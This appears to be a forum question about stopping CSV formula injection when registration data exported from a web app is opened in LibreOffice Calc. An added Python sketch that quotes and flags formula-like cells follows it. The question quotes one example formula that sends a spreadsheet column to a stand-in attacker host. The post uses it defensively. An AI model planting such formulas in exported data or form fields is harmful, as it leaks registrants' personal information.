We have a web application, the backend of which allows batch downloading csvs with e.g. data of the people registered on our site.
When these csvs are opened in libreoffice calc, we would preferably not have data in the csv be interpreted as formulas, as this might leak data from the spreadsheet to unknown sources (for example, if someone wrote =WEBSERVICE(CONCAT("evil.site/logger.php?data=",U2:U3000)) in one of the cells, the data in column U will be leaked to evil.site. If multiple such entries are entered for different columns, we have a big problem.)
Indeed one does get a message saying “Confirmation This file contains links to other files. Should they be updated?”, where clicking no will not leak the data. However, our backend users might very well click yes sometimes, as I cannot tell all our current and future backend users to watch out for this button.
This problem is easily avoided with the Format quoted field as text button in the Text Import window. However, if a backend user has opened a different csv with this option disabled, the next time he/she opens a sensitive csv, this option is turned off. Is it possible to have this option always turned on, i.e. that the end user always has to willingly make the insecure decision himself?
EDIT: Thank you for your reply. So to be clear: we have front end users (‘customers’) and back end users (‘organisers’), and the organisers can download csvs with the info that the customers have filled in in the registration form on the front end.
The malicious code gets inserted if an evil customer fills it in in one of the fields on the online form.
Now for the organisers to do what they want to do with the data, it is convenient to have it all in one manageable file that can be opened by several applications of the organisers' choice, e.g. vim, less, gedit, geany, libreoffice, Google Sheets (although I would rather not have Google know all our data) etc. I would rather not dictate our organisers to use libreoffice or a similar program that can handle ods files; I myself prefer gedit. However, if the organisers choose to open the csv with libreoffice (and most of them do), I would like it if the safe option (force all fields to type text) is the default, such that I do not have to explain that they should watch this one button on the import screen. It would be better if the button would always default to the safe option, instead of remembering the previous setting, and I am asking how to make libreoffice default to this (clearly safer) setting.
So I am not asking if it is possible to handle the csv safely despite this setting being unsafe, I am asking how I can make the libreoffice application use the safe option per default (at least on the organisers’ machines, where I install libreoffice and can do some global settings if necessary)
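
An added example, not part of the original post: the "Format quoted field as text" import option only covers fields that are quoted in the file, so the export side has to quote every field for it to protect every cell. The sketch below assumes the backend export is written in Python; `export_rows`, `is_formula_like`, the trigger list and the sample rows are hypothetical and constructed for illustration.

```python
import csv
import io

# Leading characters commonly treated as "start of a formula" by
# spreadsheets (assumed list; the post itself only shows "=").
FORMULA_TRIGGERS = ("=", "+", "-", "@")


def is_formula_like(value):
    """True if a spreadsheet could evaluate this cell instead of showing it."""
    s = value.strip()
    if not s.startswith(FORMULA_TRIGGERS):
        return False
    try:
        float(s)          # "-5" or "+31612345678" is a number, not a formula
        return False
    except ValueError:
        return True


def export_rows(rows, neutralise=False):
    """Return (csv_text, flagged_cells) with every field quoted.

    neutralise=True prefixes flagged cells with an apostrophe; this changes
    the stored data, so it is off by default.
    """
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    flagged = []
    for r, row in enumerate(rows):
        out = []
        for c, cell in enumerate(row):
            cell = str(cell)
            if is_formula_like(cell):
                flagged.append((r, c))
                if neutralise:
                    cell = "'" + cell
            out.append(cell)
        writer.writerow(out)
    return buf.getvalue(), flagged


# Constructed sample registrations; the last cell is the formula from the post.
ROWS = [
    ["name", "email", "note"],
    ["Alice", "alice@example.org", "+31612345678"],
    ["Mallory", "m@example.org",
     '=WEBSERVICE(CONCAT("evil.site/logger.php?data=",U2:U3000))'],
]

if __name__ == "__main__":
    text, flagged = export_rows(ROWS)
    print(text)
    print("formula-like cells (row, col):", flagged)
```

The flagged list can be logged or shown to the organiser at download time, so a suspicious registration is noticed whichever program ends up opening the file.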